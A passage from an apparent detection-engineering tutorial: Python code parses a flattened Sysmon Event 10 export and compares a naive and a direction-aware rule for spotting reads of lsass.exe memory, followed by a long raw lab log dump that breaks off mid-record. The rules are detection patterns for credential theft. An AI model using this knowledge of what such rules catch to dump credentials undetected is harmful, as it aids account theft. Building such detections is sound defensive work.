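# SourceThreadId SourceImage TargetProcessGUID TargetProcessId TargetImage GrantedAccess
# CallTrace. Task always equals EventID in Sysmon; the backreference uses that to split
# the fused "EventID Version Level Task Opcode" digits.
EVENT10 = re.compile(
    r"^(?P<event_id>\d+?)(?P<version>\d)(?P<level>\d)(?P=event_id)(?P<opcode>\d)"
    r"0x8000000000000000(?P<record_id>\d+)Microsoft-Windows-Sysmon/Operational"
    r"(?P<computer>.+?)-(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<src_guid>[0-9A-Fa-f-]{36})\}(?P<src_pid_tid>\d+)(?P<src_image>[A-Za-z]:\\.+?)"
    r"\{(?P<tgt_guid>[0-9A-Fa-f-]{36})\}(?P<tgt_pid>\d+)(?P<tgt_image>[A-Za-z]:\\.+?)"
    r"(?P<granted>0x[0-9A-Fa-f]+?)(?=[A-Za-z]:\\)(?P<call_trace>.*)$")


@dataclass
class ProcessAccess:
    record_id: int
    utc: str
    src_pid_tid: str  # SourceProcessId and SourceThreadId fused by the export; not separable
    src_image: str
    tgt_pid: int
    tgt_image: str
    granted: int
    call_trace: List[str]


def parse_process_access(blob: str) -> List[ProcessAccess]:
    """Recover Event 10 records from the fused export; any other event type is skipped."""
    events = []
    for rec in RECORD_SPLIT.split(blob):
        m = EVENT10.match(rec)
        if m and m["event_id"] == "10":
            events.append(ProcessAccess(
                int(m["record_id"]), m["utc"], m["src_pid_tid"], m["src_image"],
                int(m["tgt_pid"]), m["tgt_image"], int(m["granted"], 16),
                m["call_trace"].split("|")))
    return events


def decode_access(mask: int) -> List[str]:
    """Expand GrantedAccess into PROCESS_* names; bits not in the table are kept as hex."""
    if mask == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    if mask & ~KNOWN_BITS:
        names.append(f"unknown:0x{mask & ~KNOWN_BITS:x}")
    return names


def naive_lsass_hits(events: List[ProcessAccess]) -> List[ProcessAccess]:
    """The tempting rule: any ProcessAccess mentioning lsass.exe, whichever side it is on."""
    return [e for e in events
            if "lsass.exe" in e.src_image.lower() or "lsass.exe" in e.tgt_image.lower()]


def lsass_read_access(events: List[ProcessAccess]) -> List[ProcessAccess]:
    """Direction-aware heuristic (this example's choice): lsass.exe is the TargetImage
    and the handle carries PROCESS_VM_READ."""
    return [e for e in events
            if e.tgt_image.lower().endswith("\\lsass.exe") and e.granted & 0x0010]


if __name__ == "__main__":
    evs = parse_process_access(SAMPLE)
    for e in evs:  # frame 1 is the module that issued the open; frame 0 is always ntdll
        print(e.record_id, e.src_image, "->", e.tgt_image, hex(e.granted),
              "|".join(decode_access(e.granted)), "via", e.call_trace[1])
    print("naive:", [e.record_id for e in naive_lsass_hits(evs)],
          "direction-aware:", [e.record_id for e in lsass_read_access(evs)])
```

Run stand-alone, the naive rule returns 19550, 19549 and the constructed 99999; the direction-aware rule returns only 99999. For 19550 the decoded mask is VM_OPERATION, VM_READ, VM_WRITE, DUP_HANDLE, QUERY_INFORMATION and QUERY_LIMITED_INFORMATION, which looks alarming until the direction and the lsasrv.dll frame are taken into account. The fused SourceProcessId/SourceThreadId field is the practical lesson about this export format: keep the original XML (or a delimited JSON rendering) for investigations, because a flattened dump like this one loses information that no parser can put back.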
10341000x800000000000000019548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.716{4DB9351A-A036-60D3-1301-00000000CF01}67486832C:\Windows\system32\conhost.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-A036-60D3-1201-00000000CF01}67806776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+35491|UNKNOWN(00007FFF5B025A07) 23542300x800000000000000019545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76E6C1CF0FEC9FE9786AE7B3FA2C7B5D,SHA256=1082180789ACF009F7E11F4DF5AE029458B847779F8CBAFD71DAB297C35F0783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.841{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F4C1A0E4B968915989F55ADC45EA9DC,SHA256=504BF2BF618D3B57F2642E38AD20B5D88DE947F3FDC2F79757275C0DBD5185BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D5D8CF69E5E5358D81EF52A436939F4,SHA256=6BBC33EF76416B449267366DD111CFA7390BEBBBF3E152C1D3E397B91145F6BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:13.622{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.606{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:13.606{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000019564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.097{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61381-false10.0.1.12-8000- 10341000x800000000000000019563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:14.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:14.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:14.013{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:15.013{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D418D557C72ABB5C47DE6DE83C62C95,SHA256=54AE705E33BE4D5504C3538D53E1E51C132B6FF54F6B896A3B17237DB90C0775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:14.997{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69F1D9D9FD719D062DE4301EEC2E7BE8,SHA256=AF5B34DAB3D13AD11764666A6D8366E64B0E0E0B7B99F85FFC5B8E44CE158B32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:16.122{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6292CD3E46572BB53E0E0F76B0A17F75,SHA256=0D0FAF1AED6335A12C00FB4A94666C4A242DDD360AF643D1B81323A1BF26AA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:17.138{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B9BFCE6873803203C5F9C61E723963,SHA256=8C8C87783F3A7D683CEA8214B9CBF3D253FB49DFC49A1089AC13FF942572E2E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:18.700{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be4-0\System.dll2021-06-23 21:02:18.700 23542300x800000000000000019569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:18.169{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FED20933CC2DC9F88012B75A7E8270,SHA256=972E1CB643D98348F1A2FA2F92F7F9788E8C6F724405F5B7AEF56AF2FA49B0A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.778{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:19.763{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15B-60D3-F002-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:19.388{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.372{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:19.372{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15B-60D3-EF02-00000000CF01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.184{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE675E6BA3F272D8A893B537CBB0CA4,SHA256=0FBE96C5D9E38D8A36BB05B026CB712D27FC743016E85FBAFEC265F450AC5202,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:19.113{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61382-false10.0.1.12-8000- 23542300x800000000000000019580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.544{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADA7FED7C269A8D32032602865D048C6,SHA256=3A9CE38E623DBBA5EB26790B2D47FE8EFFC509FF1888AA78C8F7C2186E65A3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.544{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB616C3419877F2D76A9B2914C4F2C91,SHA256=A5538775588C54115314ACF9EC05CE1AAFFEF1737CB973914186DABF79A522E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:20.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA79D382C65AB5677E0882CB2351C397,SHA256=B5B81B55454AB48BD5AC5A4BA7939FF344460A69BAAD607F029705F89F90DE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:21.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6018C6AEE8398B820732ED7CEE6CC5,SHA256=5AEC56B21EB732715FBE6BCC60E845CC88CA3CA67EEC5F8DAF838E80EA688029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:22.231{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 